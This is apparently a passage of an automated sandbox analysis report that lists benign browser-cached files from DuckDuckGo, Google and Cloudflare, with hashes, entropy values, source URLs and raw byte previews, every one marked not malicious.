                                                                                                                                                            Preview:......JFIF.............hExif..II*.......1.......&...i...............Picasa............0220........L.......2017:07:27 14:15:42.............................................................................................................................................0.0........................................./...........................!.1"...Aa..#%23B..................................5......................!1..A.Qaq......"2.....#BR................?..Q....r.n...Z.jc.....j..OY....5..D.?..{i.`..J.L.h...E5r.s...H. ..C.......v.DT.U..M.$..n....M.....D$..'.^.m3..H.:f..Y&...2...zZ...~%5.eK.7....~.......O[v7r.0...3R5.O.EUHbL.:.>._.,.S./f..c.b08RL..0r.X8..l.\.O*.....g..C...U.K;.....J..O.C.sm.9......<.=.\"..^$i.5L....J9...6...3.~.G.p.o.d.$.mg.....W...6'c...G;....AH.A.m,h.....,....%w.1..*i.m*k....wD8.;9d...Z.N\...y..QIKn...j`...u.$.E.*...)..6.u9...!Er..$|F.~.m..@udR.O}..P'o.i...{4.Rd.H...L..S..b...i.x.0B4.......3+...{.JP...!N.....z5....2gK3....s....?T6....V.$.U.%......V....KoF
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):374908
                                                                                                                                                            Entropy (8bit):5.608217900808401
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:HOGc5euRHD0HDXc5KvfIj8Xw19wKetWlY:mHD0HDXc5iInGKetT
                                                                                                                                                            MD5:21481D63D20F1D8BA469CEC6448E83F6
                                                                                                                                                            SHA1:ECC8D18C5FEFFD4EBEEB0FEA97523AE76E5221AE
                                                                                                                                                            SHA-256:D6B8F1881D29CC897F905D9075BA31FD2142E78D06488AD50770861705851259
                                                                                                                                                            SHA-512:6048BD59875CBAA6DBFFA95FF517507861E5FA5DC4ED3BD68A53D1B32DB326A93137012A4A743442AE33D1D8CAD201E956B0E827DDC5B40572ABA46E4564162F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/chunks/pages/_app-a22172a0a3988563.js
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[92888],{25687:function(e,t,r){"use strict";function n(e){return Math.floor(Math.log(e)*Math.LOG10E)}function s(e,t){if("function"===typeof e.repeat)return e.repeat(t);for(var r=new Array(t),n=0;n<r.length;n++)r[n]=e;return r.join("")}function a(e,t,r,n){e.get(t)||e.set(t,Object.create(null)),e.get(t)[r]=n}function o(e,t,r){for(var n=0,s=Object.keys(r);n<s.length;n++){var o=s[n];a(e,t,o,r[o])}}function i(e,t,r){return d(e,t,r)[r]}function d(e,t){for(var r=[],n=2;n<arguments.length;n++)r[n-2]=arguments[n];var s=e.get(t);if(!s)throw new TypeError("".concat(t," InternalSlot has not been initialized"));return r.reduce((function(e,t){return e[t]=s[t],e}),Object.create(null))}function c(e){return"literal"===e.type}function u(e,t,r){var n=r.value;Object.defineProperty(e,t,{configurable:!0,enumerable:!1,writable:!0,value:n})}r.d(t,{$0:function(){return d},LS:function(){return a},Tg:function(){return n},_x:function(){return u},e7:function(
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):16939
                                                                                                                                                            Entropy (8bit):7.970774919746986
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:1TpjNTaqP9/D89ltNYElf/eZmT/gCvfeOkPmH8CwTdHAf:DjNTaGBc/eZmDgCvfWmLwTdo
                                                                                                                                                            MD5:C03246ACB6A2736F4404FADD86BD7100
                                                                                                                                                            SHA1:E9005AEFEF550076C87D1930FEABD346DF00F874
                                                                                                                                                            SHA-256:AF859DB11244C077F3C07EA7E7F779C2F5F2E0676C56603434FE6A61AA751D59
                                                                                                                                                            SHA-512:217D578DA0C949A0A1773328C86D6BABEAF5A0730D4762B8DCD1D162B01CDA14CE261A1E33187D9BBA0AFF678E0795FD04206BB26D5102AE520002FEE31E76E5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/media/safari-lg.8406694a.png
                                                                                                                                                            Preview:.PNG........IHDR..............>a.....pHYs...%...%.IR$.....sRGB.........gAMA......a...A.IDATx..]..U...}o*.. ...@.A..i.@E.%......MLQ#..fW...EE1k[......V...&0.E...m:3..g...{.R......w.}..{.......-.B-.B-.B-.B-.B-.B-.....?.5k..]z..}?.....j.......,....w'..hd.(dh.|.MII.......D...1......u.9...g....=........?_........wD.z.@.. .'%%.AF.HKK...222.....xbrC....?t....///g...%...k.}>...o.@|+...>._.D..YYY.m...l...c..0#.W..y.A...W...{<.....BYY.....(.3Q.....5..L'.}.2dR...I.i#Rf..G..2)`.Bm...}....N....8p@.C,...m$.;.[@'....c.?.U.Q.;v..[.....o'*..(,.b+S.e5.U..''......k..W..v`.:..........$......m..'....c.l....:p..F......k..}-.....9qH~..:..?.?.g6V^.N.!.....`Xw.2S.%..@..Z..g...bl.r...I'......6..>Z.-/....>#.o*6G*K..../...... V..... \z..C.1.......). A())!A..ds.'..(.. ..I].t....._..#f...s6.h............Y.`.v.x...p..VZ!.../.[..Y.....M....$.p...r#<p1....\..E.N..@.......z.w.P..ZY....L'....Lv... ......A.=...t..0nN..7.q......A4..nB0z.[Q.e+(O/...U..\.. \.....`EX....}.v.....4h
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):61
                                                                                                                                                            Entropy (8bit):3.990210155325004
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                                                                                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 640 x 410, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):76515
                                                                                                                                                            Entropy (8bit):7.963753178054859
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:8WdtQMMGe5V5U53k564NWcj6IG4+hGQIByj2JHo/GriqnQn88qW:EJ5V5R56ILQC//Qn
                                                                                                                                                            MD5:52E22B7A90DD2A296ABEEB984436EBD0
                                                                                                                                                            SHA1:3B6B84A2E5CA3AC232305BD7937D9CC6E6165E46
                                                                                                                                                            SHA-256:FFA18F7FF949E8628C5500813100A6F151D7680CE194EC8D600A54740F821892
                                                                                                                                                            SHA-512:EEE0B8BFBD118D1C643A61A7B14B1D1FFFEBECB0CA9BBE49C99B86DBF0CF57831A68C2E34C541A0A6705D1E68CDFFF4F605C1B7C3A08E63427898BC57F12B358
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR..............h.C....pHYs.................sRGB.........gAMA......a...*xIDATx.....d.U%..g.....1eDdFf.R9!..).B..H...B......_._T...U...$5.....ZE.E.V7...).!.Z@.P1H.)..D9+2f.....'.^.}...........X.f.&...}..{.}.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0....A@G.a........V`.n.o...o..\k.F.!~>n......9....s...9N|y.s.s.u=..w..kR....../......y......:...{...s...[k.Z...y.{n....s.?&.........+..P.=.._.o......._.{.7.8.<...G.x..z..Q.#..:<.N.......7hE...$*.Wl0...z._...I..6z.j.........u.....O.:E.?.3X.k...pj\....[...j......{..........?[.Xu..~.....W.!.}.p.z...o_u....[..H..:^..?.}..}..........M......{..?k.....=
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 23 x 30, 8-bit/color RGB, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):61
                                                                                                                                                            Entropy (8bit):4.002585360278503
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:yionv//thPlmr4qlCyxl/k4E08up:6v/lhP4Eqt7Tp
                                                                                                                                                            MD5:D62238CEBEA25A62F9BEB61273D20EED
                                                                                                                                                            SHA1:5F5D7DBC8050E4DB06A735DA5ACF26B4F2F6E741
                                                                                                                                                            SHA-256:F8265A5092A098AB7110DD7944B483A1237BFD707A3C86D9992F469A347BF5D9
                                                                                                                                                            SHA-512:8F5612675652990CE3EFAB5758CA42FD01D482AB29BF2D823A0E89CC7C0BE4DD6026BF94D85B9E5F1B2E53A05EADE744EE8C699298809E954F74521D5476725F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR.............HG.?....IDAT.....$.....IEND.B`.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 670 x 1264, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):107143
                                                                                                                                                            Entropy (8bit):7.9865347373558375
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:i7Chf4WTu5Bx/dBQsSMS1OAG35FIw0hwrDhpihSEyWugTkgU/nkBpMYnapl1Vq7B:iGZgBpfS1HGpFuw/hp/2cnUagkK+e
                                                                                                                                                            MD5:D7A9624777768585B192B954246F2924
                                                                                                                                                            SHA1:22C6430C735AEFE12A564A5DC6E36443F496FC04
                                                                                                                                                            SHA-256:EC1517AF9A6E24B331AE640BC1505E15225A211444940BD87C0016D6E275A6EE
                                                                                                                                                            SHA-512:1E234C80D8494F82223FF406CCF9AB8AFDE6A15AFF0AEBC604EAD76D9223DBC9610A0D1EC00261FB7FA035C53CA071D83C70B797C7E83E526E5897902E6940A1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR.............j.......PLTE....................................................W3.................m............##$................................................~~~***...qqp434.........xww...........................WJB......I>8>==.\:..GDA........fff...5&.JJI.......A3-njhD,....QQO`]\.9-%....P1....hC-UD2....cUL*Ohq^TN8,]9$-"........cB.........zJ%...t;.WWW..sT.....e ..Y:........~iY.H.x...b..z.eB=...........~s..-.d.x..uW.8L...tg+...~:.U.r.W..#..$...lLrO:%CY....r,...R....k..p.yJ.r.Q).......{fF.......A_S0._&.l<l`;a2.D=(..Q.....N%...~..a......F....ZC....~.n.Z..U.....T......o.e..~....>>^e..d.N...a...;k.G.rv|x<..6.x.5c.V.P....g..o................*.......Qr[.....|.._.Q....>+....U1U....3+u....;...(.^e..mPn.......... ..{u.i..{).i.....tRNS....!*..qY...*....-IDATx...............................3Xn........t.....&.2.O=Dd.#..F.@.4..c.1..c.1..c.....B...m......~......T....%.. ..5.0fz.".......=.n....T.F......4........<.45
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 500x434, components 3
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):27810
                                                                                                                                                            Entropy (8bit):7.809353502602735
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:PHhj0/kiQDHlH/Bo0ml4zSovVci0dzvWlm4j3poRdBzZf:PtJiOfBoplXfiC0PpoRdBzV
                                                                                                                                                            MD5:CE35E6D2396F02A5663E16013B8C3278
                                                                                                                                                            SHA1:8C227FC553D32B6C0FF2E869652A904E3816DD18
                                                                                                                                                            SHA-256:F3E347E3F83C34C55DD2D64BF754ED4C9F217D9FE1E9E0FF94A3490466D04987
                                                                                                                                                            SHA-512:537F7478BF6045839D162F38583123388D84D0BD8EB04EF0EE1C77E00E91585A6B8457817D566BD83E96E2E05888AC419E90C532AB0ECD429C0A8757C9F8CDC6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/backgrounds/download-bg-md-lg.jpg
                                                                                                                                                            Preview:......JFIF.....H.H.....C....................................................................C.........................................................................................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...kA....P.@....P.@....P..b.I.PH.`...+... .....(......(....+....3G2..2=h....dz.W..17.w}.......Y..J..,.p...|..Qw....Qw....{..r...mu.Q7............k...P....*W}.. .......9D.?.i^O..>A._jZ...<........O_.G....P.......}....n.9.......oA....G3.....O4...p.......p.....]..:..f......0...X3G:.........(.`.s0.9..~O..L...S@Y.O..Ad...Ad..E.awR.X\.ZVb.......P.@......R}....:
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 2360 x 1504, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):204887
                                                                                                                                                            Entropy (8bit):7.971580881211011
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:1t5xj7vQ03q8/kEfWMzzJrvlx8XjT5epql5bEPBu/:1bV7403qhEeGFLlx8Xj9yql5bEPBQ
                                                                                                                                                            MD5:BB5E516EE8D9BC7A0CA28A6663CA01DA
                                                                                                                                                            SHA1:172B7F523C2CFCE3481C5C387B057F8C7B1596D1
                                                                                                                                                            SHA-256:D4F7AE09B7C9D350E9A11200632FA8D334FE5BC6C0E15B919E385358F8D04CE4
                                                                                                                                                            SHA-512:839D0CF98C5B2C9A1D4E35A7AB5C2F8BCEA62B4564DA09FAF459087A36FF9C9A376DE198718A14D6EBC48EF1AAEB9C437BC8B1E6CE1CF6FAB60FD18CA605DAB5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/image/pages/home/devices/how-it-works/desktop/search-protection-back-light.png
                                                                                                                                                            Preview:.PNG........IHDR...8.........H@DL....PLTE..........................................g.b...............rq..........................................JJJ..."""...fffOOOEEE)))......AAAzzz'&&.W4...>>>777___VVV$$$...vuu,,,..."..ZZZ///...212! .rqq..~.........nmmSSS......544<;;........jjj999.........;-.......UD$...YH'...@0....(........F%................/$.......4*.ccc?'.P?!...L'....3&.,!.......$........S+....e9.8"..........I@.T3.L/.E+....5..J:....]1....B7.G3.;0....RH.[9.oA.XO.`L*?.................O8.wo............;mf.t7...qj.zK.Z>....9i.bA.eG.}v...sP \T.|.e]..A.|Y...aX.ia..^Z..K.oU2+....<.H...iQ...YXI6...Y".qEtZ6.d=..oO@-......bRA.}J.Z.e>.e0...@6(.[..h$......b.rTqbJ..p.8.L.;..k.z._..................k5.6.......{l..`....v)....*..8.Pz.q.......t`v....<U...x.4...t,(....tRNS........." .$.........O...r..z....IDATx.........................................................................`..h.A..........l.LLk.Xgl.d....bz"""""""""""""""""".p2....F.g...._...U.......
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):432
                                                                                                                                                            Entropy (8bit):5.329229686633821
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:hYA0HqJmqGGXG79hLFBkAAqJmPm/esHbSXd4Nbx4IQL:hYPcBNgBvPz7St4NW
                                                                                                                                                            MD5:997831EB03C8D15BF021C57F124CCE60
                                                                                                                                                            SHA1:4819D83653F4CE4710284772E0527E5FE8E2A209
                                                                                                                                                            SHA-256:0C7C78BB4F1F39B2A25A68D3AAE37D676095F4B4D67CE7F380B19E13B496B2B1
                                                                                                                                                            SHA-512:57E135784B5CC3499A165E4C0D8A3F9D79723B0A019D243F2128B8E602D72B9D346006D637709B9B1ED925B02C86EAE3D605C909AA9DFA08BE5FC70EC42894FF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://scone-pa.clients6.google.com/static/proxy.html?usegapi=1&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.gapi.en.7LPvRDgzcqA.O%2Fam%3DAACA%2Fd%3D1%2Frs%3DAHpOoo9wdgl3D0Cd5pn6O1gZXHwWDc_oTg%2Fm%3D__features__
                                                                                                                                                            Preview:<!DOCTYPE html>.<html>.<head>.<title></title>.<meta http-equiv="X-UA-Compatible" content="IE=edge" />.<script type="text/javascript" nonce="uwSnm22MxZOBu1qeAS7ERQ">. window['startup'] = function() {. googleapis.server.init();. };.</script>.<script type="text/javascript". src="https://apis.google.com/js/googleapis.proxy.js?onload=startup" async. defer nonce="uwSnm22MxZOBu1qeAS7ERQ"></script>.</head>.<body>.</body>.</html>.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):2318
                                                                                                                                                            Entropy (8bit):5.206665349898711
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:+XfQSkHJBWr3fv5Ge3CfGvWviPT8MgTstDzPHu2GH4vwJRHozktkHJBWr3b:+vEHnWrpJ04WyFz/dGH4++HnWrL
                                                                                                                                                            MD5:7BBB431D2E9FB94BB738BEA8E1E2E218
                                                                                                                                                            SHA1:479AC381EF226D54E998A30E8210F14B87028E93
                                                                                                                                                            SHA-256:D2140D44A0416BA4B09271EF7DA2FB106BAB382BAD52E105D82786F305E38E90
                                                                                                                                                            SHA-512:EF2C0AF6FF991B58BBBE45FD0290E16A73FFF69DAA7D40D56ACBDBB1B8273444CFE8DF1626E3F6F3E093AC3602AB1BF92FCFAE89A3E389D183417B0E4A7AB8CD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://fonts.gstatic.com/s/i/productlogos/chrome_store/v7/192px.svg
                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" height="192" viewBox="0 0 192 192" width="192"><path d="M0 0h192v192H0z" fill="none"/><defs><path d="M8 20v140c0 6.6 5.4 12 12 12h152c6.6 0 12-5.4 12-12V20H8zm108 32H76c-4.42 0-8-3.58-8-8s3.58-8 8-8h40c4.42 0 8 3.58 8 8s-3.58 8-8 8z" id="a"/></defs><clipPath id="b"><use overflow="visible" xlink:href="#a"/></clipPath><path clip-path="url(#b)" d="M8 20h176v152H8z" fill="#eee"/><path clip-path="url(#b)" d="M116 36H76c-4.42 0-8 3.58-8 8s3.58 8 8 8h40c4.42 0 8-3.58 8-8s-3.58-8-8-8z" fill="#fff"/><g clip-path="url(#b)"><defs><circle cx="96" cy="160" id="c" r="76"/></defs><clipPath id="d"><use overflow="visible" xlink:href="#c"/></clipPath><path clip-path="url(#d)" d="M32.07 84v93.27h34.01L96 125.45h76V84zm0 0v93.27h34.01L96 125.45h76V84z" fill="#DB4437"/><path clip-path="url(#d)" d="M20 236h72.34l33.58-33.58v-25.14l-59.84-.01L20 98.24zm0 0h72.34l33.58-33.58v-25.14l-59.84-.01L20 98.24z" fill="#0F9D58"/><path cl
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, progressive, precision 8, 1510x1138, components 3
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):177944
                                                                                                                                                            Entropy (8bit):7.890380235328535
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:2J545YTpdpktn6kKyXmHkp/Tta3oytz/ODS4tkVuD8J5Yq:2E5YTpzkt4tc/ErZ0kVe8t
                                                                                                                                                            MD5:F2E1704474BE785CF9816168CD985899
                                                                                                                                                            SHA1:4F65D696A330AC3D578AA6358570BD9370E2F15E
                                                                                                                                                            SHA-256:88FBC831CEA8FE8FBCDF2C7505391CB26B49FC1CA88E2168AC3FB93474ACD2D2
                                                                                                                                                            SHA-512:4B0EB798548C626CD2EA10A70F8FE247D40F013969FE4C56BE5FB3F82375D7F9EFA05277BFB4F07057052CA65F25CCF70654CBC2ACB8F99B06E27F020F617AE2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/media/climber.4590e32c.jpg
                                                                                                                                                            Preview:......JFIF.....,.,......ICC_PROFILE.......lcms.0..mntrRGB XYZ .........../acspAPPL...................................-lcms................................................desc... ...@cprt...`...6wtpt........chad.......,rXYZ........bXYZ........gXYZ........rTRC....... gTRC....... bTRC....... chrm...4...$dmnd...X...$dmdd...|...$mluc............enUS...$.....G.I.M.P. .b.u.i.l.t.-.i.n. .s.R.G.Bmluc............enUS.........P.u.b.l.i.c. .D.o.m.a.i.n..XYZ ...............-sf32.......B.......%.......................nXYZ ......o...8.....XYZ ......$.........XYZ ......b.........para..........ff......Y.......[chrm..............T|..L.......&g...\mluc............enUS.........G.I.M.Pmluc............enUS.........s.R.G.B...C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......r.....................................................................................P............................................@.2..@.-...-.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 42536, version 1.0
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):42536
                                                                                                                                                            Entropy (8bit):7.995098165333953
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:768:3L4aOGt0ByMNElccT+Mh9iZh3Qy3hk5KD1TFRcHNzhVQ23I/oTYCodmLcJJ:3DOnyMNicK9ygyxXD1pKH62QaodjJJ
                                                                                                                                                            MD5:64FBB6107105770AD34CF8AEAB88C0D1
                                                                                                                                                            SHA1:216FA8F176527D06DD5BBD247FEEA54637DF587D
                                                                                                                                                            SHA-256:4F9572518C6F22E97DDE811FAF185B6BBD07D5098D089B173976805B38F92CE3
                                                                                                                                                            SHA-512:4F888804FBB622223483A5DD350D34FE84F0D66DD5DC6865AB47C57BA6222D17136FD1F6ECE78B5EEDE522C03D4C7D846E0EA4553146830FDCFCC048B11E663F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/font/ProximaNova-RegIt-webfont.woff2
                                                                                                                                                            Preview:wOF2.......(.......,...............................?FFTM..f..*..D.`..&..F........x..J..`..6.$..<. ........a[R....6.MI.(.d.oW65.Q[5......t..>..*%l\..............??....r.K...6{...J.(...f...*.....s.jq.$u\.R6..$.jv...<I...!...\..d..c.leA...D.t...3.....*...s..F@..0a..STs.=n....,ExI...]_.UB2.R..Ud.\.(S...%...R.d.Um....wu...B..p...^....)......>.|.O.5..55..qIx.3.Oh..2.5a...>.[.I.?.R}....o.^.y.y(.....0'C7a..C.gI......|...F.<........N.4..wS..e.z0........?.......!r.bG...G..Px2f.......*>.._...u37......B...#W:..+p..s.....U.S.m...Vl%.......9.{nz.A!...@....<..3......k....4..$......v.u...0Ii?f........]7.W.Lo...A.*.;~|..-..l.d...h;....E.....+..gl9Q..U...$.4.J.l.w.N..;SL-....x...f...=`..0.........s~.Wa..6 4FU....3.{... ...^.Aj...S.u....OD)..M.mVa!."...Q.........`..v.*P..f..9o.tU.........G...|`..P....U..0--.h..._[#*...Lw..Q.....![..2..a.ujyY......b..jg1.&.$...O..!~......@x........|1.,.Q6......U].M.\Q.4....OD.,...L....`.,c..........D=D..B=k..e..pV6.....Z#..+....BH
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 500x434, components 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):27810
                                                                                                                                                            Entropy (8bit):7.809353502602735
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:PHhj0/kiQDHlH/Bo0ml4zSovVci0dzvWlm4j3poRdBzZf:PtJiOfBoplXfiC0PpoRdBzV
                                                                                                                                                            MD5:CE35E6D2396F02A5663E16013B8C3278
                                                                                                                                                            SHA1:8C227FC553D32B6C0FF2E869652A904E3816DD18
                                                                                                                                                            SHA-256:F3E347E3F83C34C55DD2D64BF754ED4C9F217D9FE1E9E0FF94A3490466D04987
                                                                                                                                                            SHA-512:537F7478BF6045839D162F38583123388D84D0BD8EB04EF0EE1C77E00E91585A6B8457817D566BD83E96E2E05888AC419E90C532AB0ECD429C0A8757C9F8CDC6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:......JFIF.....H.H.....C....................................................................C.........................................................................................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...kA....P.@....P.@....P..b.I.PH.`...+... .....(......(....+....3G2..2=h....dz.W..17.w}.......Y..J..,.p...|..Qw....Qw....{..r...mu.Q7............k...P....*W}.. .......9D.?.i^O..>A._jZ...<........O_.G....P.......}....n.9.......oA....G3.....O4...p.......p.....]..:..f......0...X3G:.........(.`.s0.9..~O..L...S@Y.O..Ad...Ad..E.awR.X\.ZVb.......P.@......R}....:
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):161764
                                                                                                                                                            Entropy (8bit):4.707396915369752
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:kDncp/u8gbZrD+e398Wh6y9fqtNo9+d7ymL9nlH7YyGJpgUXrurPihGutNaG5r/v:H280rSe9aLfgomrgPihGutNaGl/v
                                                                                                                                                            MD5:3C439AD0DB3844BF0673C2B0A702A3D2
                                                                                                                                                            SHA1:FEEBED692D5881F98F8DCC3967F7416AD524672A
                                                                                                                                                            SHA-256:8B58CED524F72170394688BA13379B5CA100F8C136252F4A22D2F8E9E7C5BAE4
                                                                                                                                                            SHA-512:9A6EE86878D36A19CC10085E5CA2D5926BAE2942B3285759CC228A221E0188210DB24753D45F88D01BD3E8C8888132772189545F5D7CFFF164F325A5E51D7E4B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/chunks/56987-e5b038055786d1d4.js
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[56987],{66998:function(e,t,a){"use strict";var c,l=a(67294);function r(){return r=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var a=arguments[t];for(var c in a)Object.prototype.hasOwnProperty.call(a,c)&&(e[c]=a[c])}return e},r.apply(this,arguments)}t.Z=function(e){return l.createElement("svg",r({fill:"none",viewBox:"0 0 16 16",xmlns:"http://www.w3.org/2000/svg"},e),c||(c=l.createElement("path",{fill:"currentColor",fillRule:"evenodd",d:"M16 8A8 8 0 110 8a8 8 0 0116 0m-4.191-1.75a.75.75 0 00-1.118-1L7.025 9.347 5.33 7.275a.75.75 0 00-1.16.95l2.25 2.75A.75.75 0 007.559 11l4.25-4.75",clipRule:"evenodd"})))}},51757:function(e,t,a){"use strict";var c,l,r,o,n,i,s,m=a(67294);function p(){return p=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var a=arguments[t];for(var c in a)Object.prototype.hasOwnProperty.call(a,c)&&(e[c]=a[c])}return e},p.apply(this,arguments)}
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (470), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):470
                                                                                                                                                            Entropy (8bit):5.395422846446089
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:fbjqQ/h0IYsQMDLGqYxAU7rynHtmsaI9QfQ3tTBRX+xVj:fbj7h0IdXbYxAU7rynHt159PtTBRXAp
                                                                                                                                                            MD5:A03AE57406102C64CE925A8A5BBBC4DF
